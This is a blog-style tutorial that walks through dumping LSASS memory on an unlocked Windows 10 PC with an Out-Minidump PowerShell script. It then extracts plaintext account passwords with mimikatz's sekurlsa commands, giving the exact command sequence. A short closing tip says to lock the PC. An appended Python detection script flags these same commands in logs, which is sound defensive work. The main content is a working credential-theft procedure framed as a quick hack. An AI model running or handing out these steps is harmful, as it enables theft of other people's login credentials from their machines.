I found this article mentioning an existing vulnerability in Windows OS where you can get a plaintext view of your passwords on any unlocked Windows PC. So, I tried it on my Windows 10 PC and found that the vulnerability still exists. The method used here is not new at all, and anyone can perform this hack on any unlocked Windows PC provided that they know how to use the following tools.
In summary, here is what you need to do:
Tools you need
- mimikatz - just get the binary package, e.g. mimikatz_trunk.zip
- Out-Minidump.ps1 - PowerShell script
Download all the tools above first.
1. Perform memory dump using the PowerShell script
To perform the LSASS dump, I will use the PowerShell script - Out-Minidump.ps1. The flow of cmdlets will look like this:
# "dot sourcing" method to import function from the script
. 'G:\USERFILES\Desktop\PowerShell Playground\Out-Minidump.ps1'
# To perform the LSASS dump
Get-Process lsass | Out-Minidump
# Copy the dump file to desired location
Copy-Item .\lsass_868.dmp 'G:\USERFILES\Desktop\PowerShell Playground'
2. View the passwords using the mimikatz terminal program
As you can see, lsass_868.dmp is an example of the LSASS dump file captured using the PowerShell script. Now, it's time to use the mimikatz terminal to load the dump file as follows:
sekurlsa::minidump "G:\USERFILES\Desktop\PowerShell Playground\lsass_868.dmp"

Switching to the MINIDUMP file, so now I can view the passwords. Now, I will run this command to display all the accounts and passwords available:
sekurlsa::logonPasswords full
Voila! There, I can see my actual Microsoft Account username and password in a plaintext view.
Explanation of the vulnerability
The fact is that the password is encrypted, but the encryption is useless because the implementation depends on two basic Win32 functions: LsaProtectMemory (the encryption function) and LsaUnprotectMemory (the decryption function). Windows stores these user passwords in memory in encrypted form rather than as one-way hashes, so they can be decrypted back to plaintext with the LsaUnprotectMemory function.
It is RECOMMENDED to always LOCK your Windows PC when you are away, especially when you are in an office or public place. This hack can be done in less than five minutes!
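A defender's view of the two steps above, as an added example that is not part of the original post: a Python triage pass over logged command text that flags the Out-Minidump call, the lsass_<pid>.dmp file name and the sekurlsa commands shown here. The event tuples, host and user names, paths and severity labels are constructed assumptions, and it assumes command text is already being collected (for example by PowerShell script block logging).

```python
import re
from collections import defaultdict

# Patterns derived from the commands shown in this post (case-insensitive).
INDICATORS = {
    "out_minidump": re.compile(r"\bOut-Minidump\b", re.I),
    "lsass_handle": re.compile(r"\bGet-Process\b[^|\n]*\blsass\b", re.I),
    "lsass_dump_file": re.compile(r"\blsass_\d+\.dmp\b", re.I),
    "sekurlsa_module": re.compile(r"\bsekurlsa::(?:minidump|logonpasswords)\b", re.I),
}

# Constructed sample events: (time, host, user, logged command text).
SAMPLE_EVENTS = [
    ("09:00:01", "WS01", "alice", r"Get-Process explorer | Select-Object Id"),
    ("09:02:10", "WS01", "alice", r". 'C:\Temp\Out-Minidump.ps1'"),
    ("09:02:15", "WS01", "alice", r"Get-Process lsass | Out-Minidump"),
    ("09:02:40", "WS01", "alice", r"Copy-Item .\lsass_868.dmp 'C:\Temp'"),
    ("09:05:02", "WS01", "alice", r'sekurlsa::minidump "C:\Temp\lsass_868.dmp"'),
    ("10:11:00", "WS02", "bob", r"Get-Process lsass | Select-Object Id, Name"),
    ("10:30:00", "WS03", "carol", r"Get-Process notepad"),
]

def triage(events):
    """Group indicator hits per (host, user) and rate each group."""
    hits = defaultdict(set)
    for _time, host, user, text in events:
        for name, pattern in INDICATORS.items():
            if pattern.search(text):
                hits[(host, user)].add(name)
    report = {}
    for key, names in hits.items():
        dumped = {"out_minidump", "lsass_handle"} <= names or "lsass_dump_file" in names
        parsed = "sekurlsa_module" in names
        if dumped and parsed:
            severity = "critical"  # dump created and then loaded for parsing
        elif dumped or parsed:
            severity = "high"
        else:
            severity = "review"    # e.g. an admin only listing the lsass process
        report[key] = (severity, sorted(names))
    return report

if __name__ == "__main__":
    for (host, user), (severity, names) in triage(SAMPLE_EVENTS).items():
        print(f"{host}\\{user}: {severity} {names}")
```

The sekurlsa pattern only fires when those commands reach a logged command line; commands typed inside the interactive mimikatz console are not seen by this pass.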